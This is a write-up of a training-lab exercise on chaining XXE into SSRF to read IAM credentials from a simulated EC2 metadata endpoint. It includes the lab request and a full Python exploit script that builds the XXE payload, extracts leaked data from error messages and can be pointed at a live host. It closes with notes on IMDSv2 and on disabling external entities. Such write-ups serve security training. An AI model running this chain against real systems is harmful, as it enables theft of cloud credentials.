Exploiting XXE to perform SSRF attacks

Description

This lab has a "Check stock" feature that parses XML input and returns any unexpected values in the response.

The lab server is running a (simulated) EC2 metadata endpoint at the default URL, which is http://169.254.169.254/. This endpoint can be used to retrieve data about the instance, some of which might be sensitive.

To solve the lab, exploit the XXE vulnerability to perform an SSRF attack that obtains the server's IAM secret access key from the EC2 metadata endpoint.

Approach

After accessing the lab, I quickly identified a POST request that sent XML data to the backend. Here's the request:

POST /product/stock HTTP/2
Host: 0adc00e90446bbab80dc21ad0080005d.web-security-academy.net
Cookie: session=GoXAgdvk2vxaJtE8jsqZdWOXTZlZH1qa
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 ...

<?xml version="1.0" encoding="UTF-8"?>
<stockCheck>
  <productId>1</productId>
  <storeId>3</storeId>
</stockCheck>

I attempted to exploit the XXE vulnerability by defining an external entity that pointed at the internal metadata service, http://169.254.169.254/, and referencing that entity inside the productId element. The response was an error, "Invalid product ID: latest". This is not a dead end but the confirmation that the injection works: the parser fetched the root of the metadata endpoint, which lists the available API versions (here just "latest"), and the application echoed that fetched content back inside its error message. The error message therefore acts as the channel through which whatever the entity resolves to is read back.

Response (screenshot not reproduced; the error message read "Invalid product ID: latest"):

To proceed, I referred to an article on exploiting SSRF against the AWS metadata endpoint. It described the path http://169.254.169.254/latest/meta-data/iam/security-credentials/, which lists the names of the IAM roles attached to the instance. Pointing the external entity at this URL, I crafted the following request:

Response (screenshot not reproduced; the error message echoed the role listing):

The response revealed that the role name was 'admin'. Pointing the entity at http://169.254.169.254/latest/meta-data/iam/security-credentials/admin returned that role's temporary credentials, the document that contains the secret access key the lab asks for:

Response (screenshot not reproduced; the error message echoed the credential document):
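The whole chain, written out as an added example (this is my code, not part of the original write-up or of PortSwigger's lab): build the XXE payload for a given URL, recover the expanded entity from the "Invalid product ID: ..." error, and walk the metadata service from the role listing to the credential document. The metadata responses and the stock-check endpoint are simulated in-process with constructed data so the script runs offline; the credential values are placeholders, and the lab host and session cookie used by lab_sender are assumptions to be filled in when running against a live instance.

```python
import json
import re
import urllib.error
import urllib.request
from typing import Callable, Dict, Optional

IMDS = "http://169.254.169.254"

# Constructed stand-in for the metadata service (IMDSv1 semantics: plain GET).
# Values are placeholders, not real credentials.
FAKE_IMDS: Dict[str, str] = {
    "/": "latest",
    "/latest/meta-data/iam/security-credentials/": "admin",
    "/latest/meta-data/iam/security-credentials/admin": json.dumps({
        "AccessKeyId": "ASIAEXAMPLE00000000",
        "SecretAccessKey": "EXAMPLE-secret-not-a-real-key",
        "Token": "EXAMPLE-session-token",
    }),
}


def build_xxe_payload(url: str, store_id: int = 1) -> str:
    """stockCheck document whose productId expands to the body fetched from url."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<!DOCTYPE stockCheck [<!ENTITY xxe SYSTEM "{url}">]>\n'
        "<stockCheck>\n"
        "  <productId>&xxe;</productId>\n"
        f"  <storeId>{store_id}</storeId>\n"
        "</stockCheck>\n"
    )


def extract_leak(body: str) -> Optional[str]:
    """Pull the expanded entity out of the application's error message."""
    m = re.search(r"Invalid product ID: (.*)", body, re.DOTALL)
    return m.group(1).strip() if m else None


def simulated_stock_check(xml_doc: str) -> str:
    """Constructed stand-in for /product/stock: resolves the SYSTEM entity
    against FAKE_IMDS and echoes the resulting productId in an error."""
    ent = re.search(r'<!ENTITY\s+(\w+)\s+SYSTEM\s+"([^"]+)"', xml_doc)
    pid = re.search(r"<productId>(.*?)</productId>", xml_doc, re.DOTALL)
    if not pid:
        return "Missing parameter"
    value = pid.group(1)
    if ent and value == f"&{ent.group(1)};":
        url = ent.group(2)
        path = url[len(IMDS):] if url.startswith(IMDS) else None
        if path not in FAKE_IMDS:
            return "Entity resolution failed"  # fetch failed, nothing to echo
        value = FAKE_IMDS[path]
    if value.isdigit():
        return "42 units"
    return f"Invalid product ID: {value}"


def lab_sender(host: str, session: str) -> Callable[[str], str]:
    """send() for a live lab instance; host and session are assumed inputs."""
    def send(xml_doc: str) -> str:
        req = urllib.request.Request(
            f"https://{host}/product/stock",
            data=xml_doc.encode(),
            headers={"Content-Type": "application/xml",
                     "Cookie": f"session={session}"},
            method="POST",
        )
        try:
            with urllib.request.urlopen(req, timeout=10) as resp:
                return resp.read().decode(errors="replace")
        except urllib.error.HTTPError as e:
            return e.read().decode(errors="replace")  # the 400 carries the leak
    return send


def steal_credentials(send: Callable[[str], str]) -> dict:
    """Role listing first, then that role's credential document."""
    base = IMDS + "/latest/meta-data/iam/security-credentials/"
    listing = extract_leak(send(build_xxe_payload(base)))
    if not listing:
        raise RuntimeError("role listing not echoed; entity not expanded?")
    role = listing.splitlines()[0].strip()  # one role name per line
    creds = extract_leak(send(build_xxe_payload(base + role)))
    if not creds:
        raise RuntimeError(f"credential document for {role} not echoed")
    return json.loads(creds)


if __name__ == "__main__":
    # Offline run against the simulated endpoint; swap in
    # lab_sender("<lab-host>", "<session-cookie>") for a live instance.
    print(json.dumps(steal_credentials(simulated_stock_check), indent=2))
```

One practical caveat: the fetched body becomes XML replacement text, so a response containing `<` or an unescaped `&` will break the document and produce a parser error instead of a leak. Plain text listings and the JSON credential document contain neither, which is why this chain works without any encoding tricks.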

By obtaining this information, I solved the lab. Two notes for real engagements: the chain works because the simulated endpoint behaves like IMDSv1, which answers plain GET requests; IMDSv2 requires a session token obtained with a PUT request carrying a custom header, which an XXE-driven GET cannot supply. On the defensive side, the root cause is an XML parser that resolves external entities; disabling DTD processing, or at least external entity resolution, in the parser removes both the XXE and the SSRF it enables.